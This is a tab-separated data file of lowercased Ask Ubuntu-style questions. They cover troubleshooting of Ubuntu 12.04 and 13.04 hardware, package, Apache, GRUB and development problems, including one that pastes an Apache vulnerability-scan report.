336112	how to allow ios 7 iphone to sync ? `` trust this computer '' appears endlessly	my iphone 4s wo n't connect to my computer when running ubuntu 13.04 . the `` trust this computer '' prompt just endlessly pops up . without actually connecting . any ideas ? maybe this is just going to be it with ios 7 .
336114	how to connect ubuntu to a ms sql server 2005 ?	i am using ubuntu 13.04 and i installed wine 1.6 . i am running a dotnet application through wine , but i am getting the following error message : an error occurred while establishing connection to the server . when connecting to sql server 2005 , this failure may be caused by the fact that under the default setting sql server does not allow remote connections . the dotnet framework 2.0 installed in ubuntu client . but the same dotnet applications runs in windows client machines ( windows 7/windows xp ) . do i need to establish connections manually to that server ? or do i need to install any application for this to establish connections ?
336116	how i can print coordinates of a few point on a plot in matlab ?	i have a plot in matlab and , for further analysis , i need print coordinate of a few points in it . how i can i do that ?
336120	changing/setting dns settings on boot	i have a situation where i do not give access to a machine , but there may be circumstances where the ip settings need to be changed . i have overcome this by providing a usb stick with a file with both static and dhcp info ( renamed as appropriate ) and a script that on reboot , checks the usb stick for a file and overwrites /etc/network/interfaces to here , all good . but , the file /etc/resolv.conf holds the dns info ( as far as i know ) and i 'm not sure how this file is structured . what would be the best way for me to structure a file /etc/resolv.conf that could be overwritten with the above /etc/network/interfaces but with the dns settings ? as an example , i use static ip and my /etc/resolv.conf looks like this : nameserver 192.168.1.254 i have seen a demo file where this seems to be included in the /etc/network/interfaces file as follows ( this is just from a search . not my file ) : iface eth0 inet static address 192.168.3.3 netmask 255.255.255.0 gateway 192.168.3.1 dns-search example.com dns-nameservers 192.168.3.45 192.168.8.10 could i put all the info in one file ? if so , what then goes in the /etc/resolv.conf file ? to be honest , i 'd rather have it all in the one file so it makes the end users life easier to just modify one file . if it can be done in one file , what would be an example for dhcp ( with regards to dhcp settings ) thank you in advance for any help and suggestions !
336123	external hdd error - data recovery ubuntu 12.04	i recently connected my external hdd to ubuntu 12.04 , but now it 's not working . if i try to use ntfsfix in the terminal it gives this error message : abcd @ ubuntu : ~ $ sudo ntfsfix /dev/sdb1 [ sudo ] password for abcd : mounting volume ... ntfs_mst_post_read_fixup_warn : magic : 0x43425355 size : 1024 usa_ofs : 1024 usa_count : 65535 : invalid argument ntfs_mst_post_read_fixup_warn : magic : 0x43425355 size : 1024 usa_ofs : 1025 usa_count : 65535 : invalid argument ntfs_mst_post_read_fixup_warn : magic : 0x43425355 size : 1024 usa_ofs : 1024 usa_count : 65535 : invalid argument record 3 has no file magic ( 0x43425355 ) failed to open inode file_volume : input/output error failed attempting to correct errors ... processing $ mft and $ mftmirr ... reading $ mft ... ntfs_mst_post_read_fixup_warn : magic : 0x43425355 size : 1024 usa_ofs : 1024 usa_count : 65535 : invalid argument ok reading $ mftmirr ... ntfs_mst_post_read_fixup_warn : magic : 0x43425355 size : 1024 usa_ofs : 1025 usa_count : 65535 : invalid argument ok comparing $ mftmirr to $ mft ... ok processing of $ mft and $ mftmirr completed successfully . setting required flags on partition ... ntfs_mst_post_read_fixup_warn : magic : 0x43425355 size : 1024 usa_ofs : 1024 usa_count : 65535 : invalid argument record 3 has no file magic ( 0x43425355 ) failed to read $ volume : input/output error failed error setting volume flags . is it possible to recover data from the disk ?
336130	create apt-get install for own software	i have develop java software which i have idea to create repository for it.so every user which want to install my application can install by typing `` apt-get install myappname '' . how i can build it ?
336136	when i try installing ubuntu 13.04 , all the text is in rectangles	i burned the iso to disk following all instructions on how to burn and install ubuntu onto my laptop , so i booted up to install and i get to the dark purple screen and it stays there for a bit then goes off so i started tapping the keyboard to get it back ( i thought it was a `` tap to run disk ... . '' thing ) so then it goes back to ubuntu . i went of to get a drink , came back and saw all the text in rectangles so i looked at where the language packs were in previous versions ( far right ) and started clicking random languages ( i did n't know which i were clicking since all the text of everything was rectangles ) and even in different languages it was all in rectangles . help : (
336138	dependency issues while trying to upgrade 12.04.2 to the 12.04.3 hwe stack	while trying to upgrade my system to the latest hardware enablement stack from ubuntu 12.04.2/linux 3.5 i get the following error : $ sudo apt-get install -- install-recommends linux-generic-lts-raring xserver-xorg-lts-raring libgl1-mesa-glx-lts-raring reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libgl1-mesa-glx-lts-raring : depends : libglapi-mesa-lts-raring ( = 9.1.4-0ubuntu0.1~precise1 ) but it is not going to be installed recommends : libgl1-mesa-dri-lts-raring ( > = 7.2 ) but it is not going to be installed xserver-xorg-lts-raring : depends : xserver-xorg-video-all-lts-raring but it is not going to be installed or xorg-driver-video depends : xserver-xorg-input-evdev-lts-raring but it is not going to be installed recommends : libgl1-mesa-dri-lts-raring but it is not going to be installed recommends : xserver-xorg-input-all-lts-raring but it is not going to be installed recommends : xserver-xorg-video-all-lts-raring but it is not going to be installed recommends : x11-xserver-utils-lts-raring conflicts : libglapi-mesa : i386 ( > = 0~ ) e : unable to correct problems , you have held broken packages . how can i troubleshoot this ?
336139	pasting paths into gnome-terminal	how can i paste the path to a file or folder into the terminal . when i try to do this , it pastes the path as file : ///home/user/path/file . how can i make it paste as a normal path . guake terminal does this but sometimes i find it is better to use a normal terminal .
336140	how do i convert a trackball mouse into a 360째 scroller ?	is it possible to use the ball of a trackball mouse as a 360째 scroller ( or a 2d mouse wheel ) ?
336141	ubuntu 13.04 no menu bars	i just played with ubuntu 13.04 on my old netbook . i tried some configurations , installed xubuntu and gnome to find out , which desktop environment runs best . now i want to stay with unity . but i noticed , that in most of the applications ( like terminal , or ccsm ) the top menu bar for windows is gone . i can see the top menu bar from the application itself on top of my display . but when i try to move a window around , the bar kinda disappears . and afterwards , i ca n't move the window anymore . i know that i played a lot with unity tweak and ccsm to figure out the best settings . but i ca n't remember what i 've done wrong . so any help is appreciated ! here is a screenshot . as you can see , the terminal `` hides '' under the top menu bar , and i ca n't move the window . the same thing with the ccsm window .
336150	ubuntu 13.04 default icons in ubuntu 12.04	does anyone know where can i get unity icons set from 13.04 to install it on 12.04 ? with kind regards , abel dean .
336153	how to create a png with transparent background in inkscape ?	is it possible ? a png is generally less in size than an svg . sometimes i need small sized images in sites like launchpad .
336154	how to install cups 1.6.3 on ubuntu 13.04	we have a cups server 1.3 and my freshly installed ubuntu 13.04 pc has cups client 1.6.2 . they are incompatible . on the cups web server i saw that cups 1.6.3 has fixed the issue . `` cups 1.6.3 fixes some compatibility issues with servers running cups 1.3.12 or older ... '' so i would like to replace cups 1.6.2 with 1.6.3 on my ubuntu 13.04 pc . i guess ubuntu 13.10 will have cups 1.6.3 and later i would like to upgrade from 13.04 to 13.10 . i would thus prefer avoiding installing cups 1.6.3 manually to avoid any troubles . is there a way to install cups version 1.6.3 using a ppa or something like that ?
336155	ubuntu software center wo n't open in ubuntu 12.04	running software-center in the terminal give this output : 2013-08-23 11:25:07,917 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-08-23 11:25:07,932 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-08-23 11:25:09,272 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-08-23 11:25:09,707 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2013-08-23 11:25:11,420 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 243 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 149 , in open self._list.read_main_list ( ) systemerror : e : malformed line 60 in source list /etc/apt/sources.list ( dist parse ) 2013-08-23 11:25:15,685 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1422 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1352 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 171 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 238 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 511 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 271 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 450 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 439 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 124 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' i have tried to open update manager from the desktop and the terminal . i got the following error message in the terminal after running sudo apt-get update : e : malformed line 60 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . sources list : ~ $ sudo gksu gedit /etc/apt/sources.list yields the following : # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //fi.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //fi.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //fi.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //fi.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //fi.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //fi.archive.ubuntu.com/ubuntu/ precise universe deb http : //fi.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //fi.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //fi.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //fi.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //fi.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //fi.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //fi.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //fi.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //archive.canonical.com/ partner deb-src http : //archive.canonical.com/ partner where the malformed line 60 corresponds to : deb http : //archive.canonical.com/ partner in paragraph : deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //archive.canonical.com/ partner deb-src http : //archive.canonical.com/ partner
336160	cairo-dock confiuration gui has black background and text	at some point in time after installing cairo-dock whenever i go into the configuration screen some of the background is black with black text and i ca n't read what it says . i tried highlighting the text with the mouse but it wo n't let me . i am running xubuntu 12.04 64-bit . i have a screenshot but i do n't seem to be able to post it here . i am using cairo-dock version 3.2.1 .
336161	having 2 websites under same ip apache2 configuration ?	i know there is plenty of documentation about this , but my problem is different . i have 2 websites ( subdomains ) running on one apache2 server . site 1 is working fine , site 2 is somehow linked to the apache2 directory /var/www so when i enter page 1 i see my page . page 2 shows me the apache2 text : it works ! this is the default web page for this server . the web server software is running but no content has been added , yet . so somewhere the link is setup wrong . is apache2 only listening to the pages which are in sites-enabled , or is there something more ? because on sites-enabled i just have these 2 pages and not 1 link to /var/www do i have to setup the different hostnames somewhere else as well ? thanks in advance . this one is not working : < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /var/www/notworking/ servername notworking.working.de rewriteengine on < directory /var/www/notworking/ > railsbaseuri /notworking passengerresolvesymlinksindocumentroot on < /directory > errorlog /var/log/apache2/error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog /var/log/apache2/access.log combined < /virtualhost > this one is working < virtualhost *:80 > servername working.working1.de documentroot /data/working/www/ < directory /data/working/www/ > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > < /virtualhost >
336166	wacom bamboo button configuration and what went wrong with this wiki ?	i am trying to set up a wacom bamboo tablet model cth-470 in 12.04 64 bit . ultimately i would like to persistently ( i.e . does not reset on startup ) map the tablet finger pad buttons to superfluous mouse buttons , say 10,11,12,13 . if you know how to do this you may stop reading now ( and then hopefully tell me how to do what i want ) . https : //wiki.archlinux.org/index.php/wacom_tablet and http : //sourceforge.net/apps/mediawiki/linuxwacom/index.php ? title=tablet_configuration have pretty good explanations of how to map the bamboo buttons to x11 events using xsetwacom . however , ( a ) these settings are not persistent , they reset to defaults on start up and ( b ) mapping to mouse events wo n't work for me , i.e . doing xsetwacom -- set `` wacom bamboo 16fg 4x5 finger pad '' button 1 1 does not activate button 1 ; i run xev and no event is triggered . incidentally , after restarting , when i do xsetwacom -- get `` wacom bamboo 16fg 4x5 finger pad '' button 1 1 it returns 1 but after that xsetwacom -- set `` wacom bamboo 16fg 4x5 finger pad '' button 1 1 xsetwacom -- get `` wacom bamboo 16fg 4x5 finger pad '' button 1 returns button +1 neither triggers x11 event button 1 . doing , say xsetwacom -- get `` wacom bamboo 16fg 4x5 finger pad '' button 1 'key 1' will activate keypress '1 ' . i realize that problem ( a ) could be solved by a startup script , which i 'm ok with , but this seems like a work around , not a solution ; ( b ) seems more difficult . the wiki , https : //wiki.archlinux.org/index.php/wacom_tablet , claims to have a solution by saving a particular .conf file in a /etc/x11/x.org.conf.d directory . i did not have such a folder so i created one and copied the .conf file to it . and then my computer broke . upon regular restart , it hung . i restarted into recovery mode , and safe startup failed due to x11 not being able to find any monitors . so obviously i removed all the files from the x.org.conf.d directory , which also did n't work , but removing the entire directory did . admittedly i know almost nothing about ubuntu or linux and even less about x11 and any knowledge i have has been acquired by reading wikis , so where did i and/or this wiki go wrong ? and , once again , how do i persistently map my tablet buttons to mouse clicks ?
336169	running my shell script instead of ubuntu 's built-in file	i have my shell script ready to be run . but my problem is when i need user to run my shell script and not the ubuntu 's built-in file for example , i want user to run my passwd shell script and not ubuntu 's passwd at /usr/bin/passwd i have written alias on the .bashrc which look like this alias passwd='./passwd' my question is how do i make user to run my passwd instead of ubuntu 's passwd ? how do i disable the real passwd file ? off-topic question , how do i override sudo ? because my shell script contains sudo which will print out the required password at first run .
336172	adjusting the background color/picture for each workspace	i remember some years ago when playing with linux you could adjust the background color or picture independantly for each workspace , so you could have different colors on each space . is that possible in ubuntu 12.04 lts ?
336179	boot into ubuntu from windows and into windows from ubuntu	i 'd like to be able to boot into windows from ubuntu and into ubuntu from windows with grub . can i edit my /boot/grub/grub.cfg where there 's the following : # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 3 '' and only change from time to time the set default = `` x '' where x is the operating system on the grub list i want to boot on ? is this going to work ?
336183	replacing windows 8 with ubuntu	just bought a samsung series 9 laptop ( i7 , 128gb ssd ) with windows 8 preinstalled . can i remove and save windows 8 ( perhaps for future use ) and install ubuntu instead ?
336184	how can a user create a file without write permissions ?	i have a webserver with apache itk , configured for a specific vhost to use a specific username within it 's folder . now , this user is an owner of the files , but has no write permissions in the folder in question , however yesterday , the site has been compromised and two files with write permission have just appeared in the folder . my question is : how ? i understand that if a website is compromised , a lot can happen , but the website is still running from within the context of that username , which simply did not have permission to write any files to that folder . or am i understanding permissions incorrectly ?
336187	ati graphics card detected as different card ubuntu 12.04 lts	i ran the codesudo lshw -c display to get the model of my graphics card that i am using . it showed whistler 6600m series along with my intel hd graphics . i have switchable graphics . but my graphics card is hd 6750m . why would it be shown differently and how to rectify this ? output of lspci -nnk | grepvga -a1 : 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) subsystem : hewlett-packard company device [ 103c:1646 ] 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati whistler [ amd radeon hd 6600m series ] [ 1002:6741 ] ( rev ff ) kernel driver in use : radeon
336188	owner of transcend multimedia device changes to root , no change operations are permitted under ubuntu	so far , when i have attached the transcend external media player to usb port of my ubuntu 12.04 machine , it always got mounted with the ownership of current user , permitting all write operations . but suddenly , this device is being mounted with root ownership . this makes all write operations not permitted unless you become the root user . that it not something i will want to permit to everyday users . anyway , /etc/mtab shows the device mounted like this , /dev/sde /media/usb0 vfat rw , noexec , nodev , sync , noatime , nodiratime 0 0 /dev/sdd /media/usb1 vfat rw , noexec , nodev , sync , noatime , nodiratime 0 0 there is no entry for this in /etc/fstab so the scenario is happening from a default setting after recent upgrade . further details on the device ( df -ht ) , /dev/sde vfat 922m 385m 537m 42 % /media/usb0 /dev/sdd vfat 7.3g 7.1g 229m 97 % /media/usb1 the other usb devices like external hard drives get mounted with the ownership of current user , no problem . after mounting of the transcend device , the operations sudo chown -vr < user > : < user > /media/usb0 sudo chown -vr < user > : < user > /media/usb1 failed , as they should . i have already taken a look at these answers , 1 , 2 , 3 , without any avail . as intructed in the last one , i even tried running the command , sudo usermod -a -g plugdev , fuse masroor but that did not improve the scenario .
336189	ubuntu 13.04 with 8 gb ssd and dual boot	i have a samsung np550p5c that has a 5400 rpm 1 tb drive and a sandisk i100 8 gb ssd . at the moment i use the 8 gb drive for expresscache on windows 7 and it really made a difference on the boot time . now i 'm looking to use the ssd for ubuntu 's benefit . i got two choices : i can reinstall ubuntu and put /boot and / on the ssd , put /home , /usr , /var on hdd . although , i 'm not sure if 8 gb will be enough and not having /usr on ssd will have the impact that i want . i can find a way to use the ssd as cache with ubuntu , just as i do with windows 7 . afaik , it is okay to use the ssd as cache for two oses . however , i could n't find a cache software that would work with ubuntu . for the second option , flashcache software i found here seems alright but does n't work on /root . so , what would be my best option to make the ubuntu utilize the 8 gb ssd ?
336192	ubuntu one app does n't autostart after i renamed ubuntu one folder	i renamed the default ubuntu one folder ( ubuntu one to .ubuntu one ) and after that the ubuntu one client does n't start when computer starts . how do i solve this problem ?
336193	how do i apply a security update to apache	i have been running some penetration tests against our webserver and it 's come up with a few issues . one of them is that apache needs a security update ( http : //www.ubuntu.com/usn/usn-1765-1/ ) . i am running ubuntu 12.04 lts and the instructions on that page suggest that running apt-get update followed by apt-get upgrade will solve the issue , unfortunately i am told there are no packages to update . i tried downloading the tarball from the link but now that i 've unzipped i 'm not really sure what to do with it . searching google seems to bombard with instruction on how to install apache but if anyone knows of a guide that would be great . any advice greatly appreciated . output of apt-cache policy apache2 : apache2 : installed : 2.2.22-1ubuntu1.4 candidate : 2.2.22-1ubuntu1.4 version table : *** 2.2.22-1ubuntu1.4 0 500 http : //mirror.rackspace.com/ubuntu/ precise-updates/main amd64 packages 500 http : //mirror.rackspace.com/ubuntu/ precise-security/main amd64 packages 100 /var/lib/dpkg/status 2.2.22-1ubuntu1 0 500 http : //mirror.rackspace.com/ubuntu/ precise/main amd64 packages output of dpkg -l apache* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-==============-==============-============================================ un apache < none > ( no description available ) un apache-common < none > ( no description available ) un apache-utils < none > ( no description available ) ii apache2 2.2.22-1ubuntu apache http server metapackage un apache2-common < none > ( no description available ) un apache2-doc < none > ( no description available ) un apache2-mpm < none > ( no description available ) un apache2-mpm-ev < none > ( no description available ) un apache2-mpm-it < none > ( no description available ) ii apache2-mpm-pr 2.2.22-1ubuntu apache http server - traditional non-threade un apache2-mpm-wo < none > ( no description available ) un apache2-suexec < none > ( no description available ) un apache2-suexec < none > ( no description available ) ii apache2-utils 2.2.22-1ubuntu utility programs for webservers ii apache2.2-bin 2.2.22-1ubuntu apache http server common binary files ii apache2.2-comm 2.2.22-1ubuntu apache http server common files penetration test reporting the issue : apache partial http request denial of service vulnerability - zero day qid : 86847 category : web server cve id : - vendor reference - bugtraq id : - service modified : 05/30/2013 user modified : - edited : no pci vuln : no threat : the apache http server , commonly referred to as apache is a freely available web server . apache is vulnerable to a denial of service due to holding a connection open for partial http requests . apache versions 1.x and 2.x are vulnerable . impact : a remote attacker can cause a denial of service against the web server which would prevent legitimate users from accessing the site . denial of service tools and scripts such as slowloris takes advantage of this vulnerability . solution : patch - there are no vendor-supplied patches available at this time . workaround : - reverse proxies , load balancers and iptables can help to prevent this attack from occurring . - adjusting the timeout directive can also prevent this attack from occurring . - a new module mod_reqtimeout has been introduced since apache 2.2.15 to provide tools for mitigation against these forms of attack . also refer to cert blog and slowloris and mitigations for apache document for further information . compliance : not applicable exploitability : there is no exploitability information for this vulnerability . associated malware : there is no malware information for this vulnerability . results : qid : 86847 detected on port 80 over tcp - apache/2.2.22 ( ubuntu ) 3 apache http server prior to 2.2.23 multiple vulnerabilities qid : 87133 category : web server cve id : cve-2012-2687 cve-2012-0883 vendor reference apache bugtraq id : 53046 , 55131 service modified : 01/02/2013 user modified : - edited : no pci vuln : yes threat : apache http server is an http web server application . apache server prior to version 2.2.23 is affected by multiple issues : insecure ld_library_path handling cross-site scripting in mod_negotiation when untrusted uploads are supported affected versions : apache http server prior to version 2.2.23 impact : successful exploitation may lead to execution of arbitrary code on the system within the context of the affected applications . solution : these vulnerabilities have been patched in apache 2.2.23 . refer to apache httpd 2.2 security vulnerabilities . patch : following are links for downloading patches to fix the vulnerabilities : apache 2.2.23 ( apache http server ) compliance : not applicable exploitability : there is no exploitability information for this vulnerability . associated malware : there is no malware information for this vulnerability . results : qid 87133 detected on port 80 - apache/2.2.22 ( ubuntu ) 3 apache prior to 2.4.4 and 2.2.24 multiple vulnerabilities port 80/tcp qid : 87156 category : web server cve id : cve-2012-3499 cve-2012-4558 vendor reference apache httpd 2.2 vulnerabilities , apache httpd 2.4 vulnerabilities bugtraq id : 58165 service modified : 05/22/2013 user modified : - edited : no pci vuln : yes threat : apache http server is an http web server application . apache http server is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input . - various xss flaws exist due to unescaped hostnames and uris html output in mod_info , mod_status , mod_imagemap , mod_ldap , and mod_proxy_ftp . - a xss flaw affects the mod_proxy_balancer manager interface . affected versions : apache http server prior to 2.4.4 apache http server prior to 2.2.24 impact : an attacker may leverage these issues to execute arbitrary html and script code in the browser of an unsuspecting user in the context of the affected site . this may let the attacker launch additional attacks . solution : these vulnerabilities have been patched in apache 2.2.24 and 2.4.4 . refer to apache httpd 2.4.4 changelog and apache httpd 2.2.24 changelog . ubuntu users refer to ubuntu advisory usn-1765-1 for affected packages and patching details , or update with your package manager . patch : following are links for downloading patches to fix the vulnerabilities : apache 2.2.24 ( apache http server 2.2.24 ) apache 2.4.4 ( apache http server 2.4.4 ) compliance : not applicable exploitability : there is no exploitability information for this vulnerability . associated malware : there is no malware information for this vulnerability . results : qid 87156 detected on port 80 - apache/2.2.22 ( ubuntu ) 3 apache http server prior to 2.2.25 multiple vulnerabilities port 80/tcp qid : 87233 category : web server cve id : cve-2013-1896 cve-2013-1862 vendor reference apache 2.2.25 bugtraq id : - service modified : 07/15/2013 user modified : - edited : no pci vuln : yes threat : apache http server is an http web server application . apache http server versons before to 2.2.25 are exposed to following vulnerabilities : mod_rewrite.c in the mod_rewrite module in the apache http server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters , which might allow remote attackers to execute arbitrary commands via an http request containing an escape sequence for a terminal emulator ( cve-2013-1862 ) . mod_dav.c in the apache http server versions before 2.2.25 do not properly determine whether dav is enabled for a uri , which allows remote attackers to cause a denial of service ( segmentation fault ) via a merge request in which the uri is configured for handling by the mod_dav_svn module , but a certain href attribute in xml data refers to a non-dav uri ( cve-2013-1896 ) . impact : successfully exploiting these vulnerabilities might allow a remote attacker to execute code or cause denial of service . solution : these vulnerabilities have been patched in apache 2.2.25 . refer to apache httpd 2.2.25 changelog . patch : following are links for downloading patches to fix the vulnerabilities : apache 2.2.25 compliance : not applicable exploitability : there is no exploitability information for this vulnerability . associated malware : there is no malware information for this vulnerability . results : qid 87233 detected on port 80 - apache/2.2.22 ( ubuntu )
336194	install ubuntu along with windows and optimal partitioning ?	i want to install ubuntu as primary os . how should i do the partitioning to get maximum output ? i am java/liferay developer . my system configuration is : dual core 4 gb ram .
336204	undefined reference to `gdalallregister '	i have problem with gdal . i am currently working on ubuntu and the ide is eclipse cdt i have given my code below and i have also installed the gdal package but it gives build errors # include < stdio.h > # include < unistd.h > # include `` gdal/gdal_priv.h '' # include `` gdal/cpl_conv.h '' # include < gdal/gdal.h > int main ( int argc , char* argv [ ] ) { void *hlib_comm ; char exepath [ 800 ] ; if ( getcwd ( exepath , sizeof ( exepath ) ) == null ) { printf ( `` exe path access error\n '' ) ; } gdaldataset *podataset ; gdalallregister ( ) ; podataset = ( gdaldataset * ) gdalopen ( exepath , ga_readonly ) ; if ( podataset == null ) { printf ( `` exe path access error\n '' ) ; } } ///////////bulid result/////////////////////////////////// 14:51:47 **** build of configuration debug for project readfrmsofile **** make all building file : ../main.cpp invoking : gcc c++ compiler g++ -lm -i/usr/include/gdal -o0 -g3 -wall -c -fmessage-length=0 -mmd -mp -mf '' main.d '' -mt '' main.d '' -o `` main.o '' `` ../main.cpp '' ../main.cpp : in function ‘int main ( int , char** ) ’ : ../main.cpp:17:8 : warning : unused variable ‘hlib_comm’ [ -wunused-variable ] finished building : ../main.cpp building target : readfrmsofile invoking : gcc c++ linker g++ -lm -l/usr/lib -l/usr/lib/ogdi -o `` readfrmsofile '' ./main.o -lgdal ./main.o : in function `main ' : /media/local disk/workspace2/readfrmsofile/debug/../main.cpp:24 : undefined reference to `gdalallregister' /media/local disk/workspace2/readfrmsofile/debug/../main.cpp:26 : undefined reference to `gdalopen' collect2 : ld returned 1 exit status make : *** [ readfrmsofile ] error 1 help me ... ..
336205	loading data into mysql database	i have a text file which i would want to load into mysql database on ubuntu server 12.04 lts . i have entered the data into the file trey.txt and i moved the file to /tmp directory . when i move to the db , and enter the command load data infile '/tmp/trey.txt' into table arp_table columns terminated by '| ' ; the output is error 13 ( hy000 ) : ca n't get stat of '/tmp/trey.txt ' ( errcode : 2 ) how should i modify to enter these details . and can i run this from command line as a cron job .
336210	xmodmap reverting periodically	i 'm using xmodmap to swap control and command keys on my macbook pro . however , periodically the key revert back to their original state and this is becoming quite annoying . i 'm on ubuntu 13.10 and i can remember when this situation started occurring was when the system got a keyboard settings ( in the system settings ) update . any ideas as to how to either : 1 ) delete the keyboard settings , or 2 ) stop the keyboard settings from reverting my keys ? ? ? cheers !
336211	how to install libav from launchpad ?	how could i install this package from launchpad on ubuntu 12.04 ? ? https : //launchpad.net/ubuntu/+source/libav
